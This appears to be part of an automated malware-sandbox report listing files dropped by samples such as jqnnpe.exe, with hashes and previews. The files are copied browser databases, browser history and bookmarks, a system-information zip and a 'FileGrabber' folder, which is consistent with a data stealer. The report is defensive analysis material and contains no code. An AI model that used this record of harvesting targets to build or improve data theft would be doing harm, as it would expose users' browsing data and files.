MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp835D.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp836E.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp837E.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp83AE.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp83BF.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp83CF.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp83E0.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp850A.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp853A.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp86F8.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9A21.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA321.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA3E4.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA40A.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA679.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB795.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBA07.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBA7F.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC9C9.tmp.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\134349\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	unknown
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Roaming\134349\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Reputation:	unknown
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Roaming\134349\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Reputation:	unknown
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Roaming\134349\DotNetZip-bi3yv3ya.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Category:	dropped
Size (bytes):	672450
Entropy (8bit):	7.975683505242552
Encrypted:	false
SSDEEP:	12288:msayKnUtwKK7tRMgauNc3tMtKu4athjcueuDA38P/AmqHO3:6tnUaKc+etKu5taN38P/pqG
MD5:	727FF5A39EE0016D265DB10C5391833F
SHA1:	994D2BEB9B1AB4DD6BB8216C7852D8A5EB6953F0
SHA-256:	FA4564EE9555377BE1543B2C446B970868B3845434EBB7AC3E2CC8DBC916421E
SHA-512:	40F0282CC9D6C36EF9F7CBB6C8B9EAAE907727866CEB428851D94500ADB24CA5A271582D9A2700E03699F0C96A31F992314F13DA67E0161E4E374F83639D5809
Malicious:	false
Reputation:	unknown
Preview:	PK..-......;.X..}...........8.Information.txt............I......... ....................................xo.X...`..<Ov.w.U.._.A....Y .."..l...7..'....u+...:D..G...5}6.8.iT.q....#p.@..\..h/..I...iI.p6.e1...../SD...n...E.z4Dh..X{..V..&>.`.g..X.mJB.S.........f.T.r..4aG.JH...A.F..SW.g.....V..0.Ru/~ww(.#U....N....z.....S.{.\B..n...{@.....>d.rG?.....X..GAY.....N.[..o....1..C.......a.[M*.\.Oj...].....K...=...(...[..PK..-......;.X`.S<..........8.InstalledSoftware.txt...................... .........S......S......S.........2>l.[....Y.~M.!.T.....?<.bP.....\|..SHD......d..C..>o..Xf. .T..Q....i..t...mX.v.C.6N......t...O5].9..b...].L.g.zV{.f.....C.O..?..>,.3.q=R~v5.Q^......AS...s.p7...Ys0...L...(PK..-......;.X..[...........8.Process.txt.....9................ .........K.......K..................2>l.[...W+'H..I/.#y.....;..hg.7.G...ft......Q..,..Md....Bs.Ao.>.~^..........y... ..y..?....nwJ.....g^m........y..vx...x.[...{...E2.6.e.[Om.F....&..a.Pi..jaf.....I.a.Dp.-46..$]S

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
